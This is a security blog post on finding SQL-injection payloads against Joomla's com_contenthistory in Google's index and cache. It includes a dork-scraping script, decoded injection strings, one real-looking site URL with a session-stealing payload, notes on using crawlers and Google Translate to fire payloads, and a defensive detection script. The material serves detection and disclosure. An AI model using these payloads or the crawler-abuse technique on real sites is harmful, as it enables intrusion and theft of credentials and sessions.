Using Google to detect payloads

Google is a well-known search engine, and in the security community it is also famous for the “Google dorks” technique: finding vulnerable websites using Google queries.

Google Url Search

Exploits in the Google URL Database

Using Google dorks is not new and has been discussed thoroughly. However, while we were analysing the Joomla SQL injection vulnerability in com_contenthistory, we found this URI in the results of the Google query:

Google Webcache

If we decode the URL parameters, we get this:

com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from

Note that this URI is truncated here; the full request, however, is potentially executed by Google's web crawlers.

What is the issue?

This effect is interesting for three reasons:

1. Abusing Google (or other search engines) to execute payloads.
2. Finding potential zero-days in the Google index.
3. Getting results of exploits, such as passwords and private user data, which are cached in Google even after the issue has been fixed.

Abusing Google to execute payloads

The first technique is elaborated on in Phrack 57, article 0x0a, “Against the System: Rise of the Robots” by Michal Zalewski. Zalewski uses an HTML document containing links with payloads aimed at potentially vulnerable web servers; when crawlers pick up these links, they execute the payload on his behalf. To quote the founders of Google on this issue:

“[…] big difference between the web and traditional well controlled collections is that there is virtually no control over what people can put on the web. Couple this flexibility to publish anything with the enormous influence of search engines to route traffic and companies which deliberately manipulating search engines for profit become a serious problem.” — Sergey Brin and Lawrence Page, “The Anatomy of a Large-Scale Hypertextual Web Search Engine”, Stanford University

Googlebot concept

To expand a bit on the first issue, you could use the Google Translate function as a proxy. This allows you to skip waiting for the crawlers to pick up your malicious links and have them executed straight away:

CmdNsLookup

Finding exploits in the Google Index

The following script can be used to scrape Google; note that it needs some fine-tuning:

    pi@raspberrypi ~/bitsensor $ wget http://www.catonmat.net/downlo...
    --2016-01-04 19:54:14--  http://www.catonmat.net/downlo...
    Resolving www.catonmat.net (www.catonmat.net)... 50.22.83.242
    Connecting to www.catonmat.net (www.catonmat.net)|50.22.83.242|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [application/zip]
    Saving to: `xgoogle.zip`

        [   <=>             ] 70,319       1121K/s   in 0.1s    
    2016-01-04 19:54:20 (1121 KB/s) - `xgoogle.zip` saved [70319]
    pi@raspberrypi ~/bitsensor $ unzip xgoogle.zip 
    Archive:  xgoogle.zip
    www.catonmat.net
       creating: examples/
      inflating: examples/example2.py    
      inflating: examples/example3.py    
      inflating: examples/example1.py    
       creating: programs/
      inflating: programs/google_fight2.py 
      inflating: programs/google_fight.py  
      inflating: programs/english.py     
       creating: xgoogle/
      inflating: xgoogle/browser.py      
      inflating: xgoogle/sponsoredlinks.py
      inflating: xgoogle/__init__.pyc    
      inflating: xgoogle/search.py       
      inflating: xgoogle/BeautifulSoup.pyc  
      inflating: xgoogle/googlesets.py   
      inflating: xgoogle/BeautifulSoup.py
      inflating: xgoogle/browser.pyc     
      inflating: xgoogle/search.pyc      
      inflating: xgoogle/translate.py    
      inflating: xgoogle/__init__.py     
      inflating: contributors.txt 
      inflating: projects-using-xgoogle.txt  
      inflating: readme.txt              
    pi@raspberrypi ~/bitsensor $ ls
    contributors.txt  examples  programs  projects-using-xgoogle.txt  readme.txt  xgoogle
    pi@raspberrypi ~/bitsensor $ cat GoogleSearch.py 
    # Python 2 script: xgoogle (and its bundled BeautifulSoup 3) only runs on Python 2.
    from xgoogle.search import GoogleSearch, SearchError
    from random import randint
    import time

    try:
        # Dork for Joomla pages that expose the com_contenthistory component.
        gs = GoogleSearch("inurl:'index.php?option=com_contenthistory'")
        gs.results_per_page = 50

        displayedResults = 0
        # Every get_results() call fetches the next page of results.
        results = gs.get_results()
        while displayedResults < gs.num_results:
            for res in results:
                if res.url is not None:
                    print res.url.encode('utf8')
            print
            # Advance the counter once per fetched page, not once per printed URL.
            displayedResults += gs.results_per_page
            # Random delay between requests to reduce the chance of being blocked.
            time.sleep(randint(15, 60))
            results = gs.get_results()
    except SearchError, e:
        print "Search failed: %s" % e

    pi@raspberrypi ~/bitsensor $ python GoogleSearch.py
    http://hafelekar.com/en/index.php?option=com_contenthistory&view=history&list%5Bselect%5D=1+AND+extractvalue(rand()%2Cconcat(0x23%2C(SELECT+concat(session_id%2C0x23)+FROM+ugq2y_session+WHERE+userid%3D44+LIMIT+0%2C1)))--+-
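The decoding done by hand earlier (turning `list%5Bselect%5D=...` into a readable `list[select]` parameter) and the triage of URLs that the scraper above prints can both be automated on the defender's side. The following Python 3 script is an added example and is not part of the original post or of the xgoogle project: it URL-decodes each indexed URL, splits the query string into parameters, and flags values that carry SQL-injection indicators of the kind quoted in this article (`extractvalue(`, `concat(`, `select ... from`, the `count(*)` trick, a trailing `--` comment). The same function can be run over a web server's access log or over the URLs received through Google Alerts. The sample URLs, the `example.com` host and the `jos_session` table name are constructed for illustration.

```python
"""Added example (not from the original post): decode the query string of an
indexed URL and flag parameters that carry SQL-injection style payloads, as seen
in the com_contenthistory dork results. Sample input below is constructed."""
import re
from urllib.parse import urlsplit, parse_qsl

# Heuristic indicators taken from the payload shapes quoted in the article.
# They are triage signals for a defender, not a SQL parser.
SQLI_PATTERNS = [
    r"\bselect\b[^;]*\bfrom\b",       # subquery pulling rows out of a table
    r"\bunion\b\s+(all\s+)?select\b",
    r"\bextractvalue\s*\(",           # error-based extraction (MySQL)
    r"\bupdatexml\s*\(",
    r"\bconcat\s*\(",
    r"\bcount\s*\(\s*\*\s*\)",        # count(*) / group by duplicate-key trick
    r"\bsleep\s*\(",
    r"--\s*[-+]?\s*$",                # trailing SQL comment terminator
]
SQLI_RE = re.compile("|".join(SQLI_PATTERNS), re.IGNORECASE)


def decode_query(url):
    """Return the query string of `url` as a list of (name, value) pairs.

    parse_qsl decodes %xx escapes and '+' in both names and values;
    keep_blank_values=True keeps empty parameters such as list[ordering]=,
    which the URL in the article carries.
    """
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def find_payloads(url):
    """Return the decoded parameters of `url` whose value matches an indicator.

    Each hit records the parameter name, its decoded value and the first
    indicator that matched, so an analyst can see why the URL was flagged.
    """
    hits = []
    for name, value in decode_query(url):
        match = SQLI_RE.search(value)
        if match:
            hits.append({"param": name, "value": value, "indicator": match.group(0)})
    return hits


def triage(urls):
    """Split a batch of URLs (search results, alert mails, log entries) into
    (suspicious, benign). Each entry is (url, hits)."""
    suspicious, benign = [], []
    for url in urls:
        hits = find_payloads(url)
        (suspicious if hits else benign).append((url, hits))
    return suspicious, benign


# Constructed sample input: one URL with the payload shape quoted in the article
# (host and table name are placeholders), one benign Joomla URL that uses the
# same component, and one unrelated page.
SAMPLE_URLS = [
    "http://example.com/index.php?option=com_contenthistory&view=history"
    "&list%5Bselect%5D=1+AND+extractvalue(rand()%2Cconcat(0x23%2C(SELECT+concat("
    "session_id%2C0x23)+FROM+jos_session+LIMIT+0%2C1)))--+-",
    "http://example.com/index.php?option=com_contenthistory&view=history&item_id=1&type_id=1",
    "http://example.com/index.php?option=com_content&view=article&id=42",
]

if __name__ == "__main__":
    bad, good = triage(SAMPLE_URLS)
    for url, hits in bad:
        for hit in hits:
            print("SUSPICIOUS %s param=%s indicator=%r" % (url, hit["param"], hit["indicator"]))
    print("%d suspicious, %d benign" % (len(bad), len(good)))
```

Running the script prints the flagged URL with the parameter (`list[select]`) and the first indicator that matched (`extractvalue(`). The indicator list is deliberately short and keyed to the payloads discussed here; when feeding real access logs, expect to tune it for false positives on legitimate parameters that happen to contain words such as `select`.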

Recommendation

All users of the Joomla website should be informed about the breach, and Google should be contacted to have the cached page removed. This prevents attackers from using Google Cache to retrieve information such as usernames and passwords.

Using Google Alert

Google Alerts is a service that sends an email whenever newly indexed pages match a given query. For example, if we add the above-mentioned Google query here, we receive an email listing the newly indexed site every time a matching page is added. Using this method we get a good view of which kinds of payloads are used by cyber criminals.

Google Alerts

The screenshot shows an example Google Alerts email. Note that in this case another dork is used:

Google Alerts